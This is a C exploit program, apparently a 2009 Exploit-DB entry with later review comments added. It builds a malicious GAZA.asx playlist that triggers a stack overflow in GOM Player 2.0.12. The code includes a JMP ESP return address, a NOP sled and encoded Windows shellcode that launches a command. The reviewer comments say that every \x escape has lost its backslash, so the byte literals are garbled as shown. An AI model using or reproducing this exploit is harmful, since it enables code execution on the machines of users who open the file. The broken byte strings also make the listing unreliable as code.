
# Title : GOM Player 2.0.12.3375 (.ASX File) Stack Overflow Exploit
# Published : 2009-01-08
# Author : DATA_SNIPER


/*------------------------------------------------
*  GOM Player 2.0.12 (.ASX) Stack Overflow Exploit
*-------------------------------------------------
* [_]Exploit Code by:DATA_SNIPER
* [_]Greetz: Arabic and algeria hackerz,arab4services.net and AT4RE Teams.
* [_]My blog:http://datasniper.arab4services.net
* NOTIFICATION:
* The vulnerability was reported by Parvez Anwar to Secunia; I discovered it afterwards, so all credit goes to Parvez Anwar.
* I used an internal address (in GOM.exe) for the JMP that runs the shellcode, so the exploit is universal.
* http://secunia.com/advisories/23994
* An SEH method could be implemented for a variant of this exploit.
*/

#include <stdio.h>
#include <windows.h>

/*
 * ASX playlist fragments in UTF-16LE (Header1 opens with the xFF xFE
 * byte-order mark). Decoded, Header1 is
 *   <asx version = "3.0" >\r\n<entry>\r\n<title>...mp3</title>\r\n<ref href = "
 * (the title is a short run of Arabic code points, U+06xx) and Header2 is
 *   " />\r\n</entry>\r\n</asx>\r\n
 * so everything main() places between them becomes the value of the href
 * attribute. That over-long href in a UTF-16 .ASX file is the whole
 * trigger, which is what a file-based detection rule should key on.
 *
 * NOTE(review): in this listing the backslash of every \x escape has been
 * stripped, so as written these literals are plain ASCII text and
 * sizeof() counts the characters shown rather than the intended bytes.
 */
unsigned char Header1[] = /*ASX data in unicode format */
"xFFxFEx3Cx00x61x00x73x00x78x00x20x00x76x00x65x00x72x00x73x00x69x00x6Fx00x6Ex00x20x00x3Dx00x20x00"
"x22x00x33x00x2Ex00x30x00x22x00x20x00x3Ex00x0Dx00x0Ax00x3Cx00x65x00x6Ex00x74x00x72x00x79x00x3Ex00"
"x0Dx00x0Ax00x3Cx00x74x00x69x00x74x00x6Cx00x65x00x3Ex00x48x06x2Fx06x27x06x39x06x27x06x20x00x23x06x4Ax06x47x06"
"x27x06x20x00x27x06x44x06x28x06x37x06x44x06x2Ex00x6Dx00x70x00x33x00x3Cx00x2Fx00x74x00x69x00x74x00"
"x6Cx00x65x00x3Ex00x0Dx00x0Ax00x3Cx00x72x00x65x00x66x00x20x00x68x00x72x00x65x00x66x00x20x00x3Dx00x20x00x22";
/* Closing fragment: closes the href attribute, the <ref/>, <entry> and <asx> elements. */
unsigned char Header2[] ="x22x00x20x00x2Fx00x3Ex00x0Dx00x0Ax00x3Cx00x2Fx00x65x00x6Ex00x74x00x72x00x79x00x3Ex00x0Dx00x0Ax00x3Cx00x2Fx00x61x00x73x00x78x00x3Ex00x0Dx00x0Ax00";
/*
 * Payload bytes. Per the author's note: windows/exec, x86/shikata_ga_nai
 * encoded, EXITFUNC=process, CMD=calc, 144 bytes (nine lines of 15 plus a
 * final line of 9). It is appended after the NOP sled inside the href value.
 *
 * NOTE(review): the backslashes of the \x escapes are missing in this
 * listing, so the literal is plain ASCII text and sizeof(Shell) - 1 in
 * main() is the character count of that text, not 144.
 */
unsigned char Shell[] =
"x31xc9xbdx90xb7x29xb8xd9xf7xd9x74x24xf4xb1x1e"
"x58x31x68x11x03x68x11x83xe8x6cx55xdcx44x64xde"
"x1fxb5x74x54x5ax89xffx16x60x89xfex09xe1x26x18"
"x5dxa9x98x19x8ax1fx52x2dxc7xa1x8ax7cx17x38xfe"
"xfax57x4fxf8xc3x92xbdx07x01xc9x4ax3cxd1x2axb7"
"x36x3cxb9xe8x9cxbfx55x70x56xb3xe2xf6x37xd7xf5"
"xe3x43xfbx7exf2xb8x8axddxd1x3ax4fx82x28xb5x2f"
"x6bx2fxb2xe9xa3x24x84xf9x48x4ax19xacxc4xc3x29"
"x27x22x90xeax5dx83xffx94x79xc1x73x01xe1xf8xfe"
"xdfx46xfax18xbcx09x68x84x43";
/*
 * Writes GAZA.asx to the current directory: Header1 (UTF-16LE ASX up to
 * `<ref href = "`), about 4 KB of 0x41 as the href value, then RET_Univ,
 * the NOP sled, Shell, and Header2 (`" />...</asx>`).
 *
 * Defender's view: the trigger is nothing more than an over-long href
 * attribute in a UTF-16 (FF FE) .ASX playlist, which is what a file-based
 * detection or a length check in the playlist parser should key on; the
 * vendor-side remedy is the one referenced by the Secunia advisory in the
 * file header.
 *
 * argc/argv are unused. Returns 0 on every path, including when fopen()
 * fails, so the exit status never reports failure. memset()/memcpy() are
 * declared in <string.h>, which this file relies on <windows.h> to supply
 * indirectly.
 *
 * NOTE(review): as in every string literal of this listing, the backslash
 * of each \x (and \r, \n) escape has been stripped, so RET_Univ, nop and
 * the printf() strings are plain ASCII as written; the sizeof()-based
 * offsets below describe the author's intended byte layout, not what this
 * text would actually produce.
 */
int main( int argc, char **argv ) {
char payload[4563]; /* output buffer; never zeroed (see fwrite() below) */
char junk[4171];/*Overflow trigger*/ /* filled with 0x41 ('A') below */
unsigned char RET_Univ[] = "x77x45x46x00"; // JMP ESP in GOM.exe this make it universal, & don't worry about nullbyte,greetz go to unicode ;)
/*char RET_sp2 = "xF3xC3xE1x77" /* if im wrong up there, use this => JMP ESP in kernel32.dll XP SP2 fr */
unsigned char nop[] = "x90x90x90x90x90x90x90x90"; //Nops

FILE *f;
printf("GOM Player 2.0.12 (.ASX) Stack Overflow Exploit by DATA_SNIPERrn");
printf("---------------------------------------------------rn");
memset(junk, 0x41, 4171);
printf("[_] Building Exploit..rn");
/* Every sizeof() below includes the string's NUL terminator, hence the
 * -1 / -2 / -3 / -4 corrections as each further piece is appended. */
memcpy( payload, Header1, sizeof( Header1 ) - 1 );
/* Copies 4172 bytes out of a 4171-byte array: reads one byte past the end
 * of junk (undefined behaviour). That stray byte lands exactly where
 * RET_Univ is written next, so it is overwritten rather than kept. */
memcpy( payload + sizeof( Header1 ) - 1, junk, 4172 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)-1, RET_Univ, 4 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)-2, nop, sizeof(nop)-1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(nop)+sizeof(RET_Univ)-3, Shell, sizeof( Shell ) - 1 );
memcpy( payload + sizeof( Header1 ) + sizeof(junk)+sizeof(RET_Univ)+sizeof(nop)+ sizeof(Shell)-4, Header2, sizeof( Header2 ) - 1 );
f = fopen( "GAZA.asx", "wb" );
if ( f == NULL ) {
printf("[_] Cannot create filen");
return 0; /* reports success despite the failure */
}
/* Writes the whole 4563-byte buffer rather than the assembled length;
 * whatever tail the memcpy() chain did not reach is uninitialised stack
 * memory and goes into the file with it. The fwrite()/fclose() results
 * are not checked. */
fwrite( payload, 1, sizeof(payload) , f );
fclose( f );
    printf("[_] GAZA.asx file Created,have unf :)rn");
return 0;
}
